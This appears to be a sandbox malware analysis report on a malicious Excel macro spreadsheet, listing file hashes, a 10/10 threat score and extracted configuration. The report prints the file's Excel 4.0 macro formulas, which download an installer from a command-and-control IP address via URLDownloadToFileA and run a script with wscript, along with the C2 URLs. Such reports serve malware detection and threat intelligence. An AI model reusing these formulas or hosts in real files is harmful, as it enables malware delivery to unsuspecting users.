Overview

overview

10

Static

static

10

3dfd7a0588...0.xlsm

windows7-x64

10

3dfd7a0588...0.xlsm

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    3dfd7a05888079316ce4d1e98b764ac0

  • Size

    6KB

  • MD5

    3dfd7a05888079316ce4d1e98b764ac0

  • SHA1

    44f73eef6152576b3e577ac205b88cd008e28df8

  • SHA256

    4fd0627e41ee9246f051cdc8765e01a0693bbb1fae8737d6bb365abd5e9afec9

  • SHA512

    294d4b8ebd5b90f1fa031c9d0a78b0198fd4d4f2d9fdc359073ed55b42420055ddb5add0354207f25ebf5fbea0f471afca698cb5d8a59acf8a60102e60e41627

  • SSDEEP

    192:NDS6uSgbrA2OmmfRX8UhHFBFYuJb98yga+G:NBuxM2wN1FYIb98ygG

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php
Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

  • 3dfd7a05888079316ce4d1e98b764ac0
    .xlsm office2007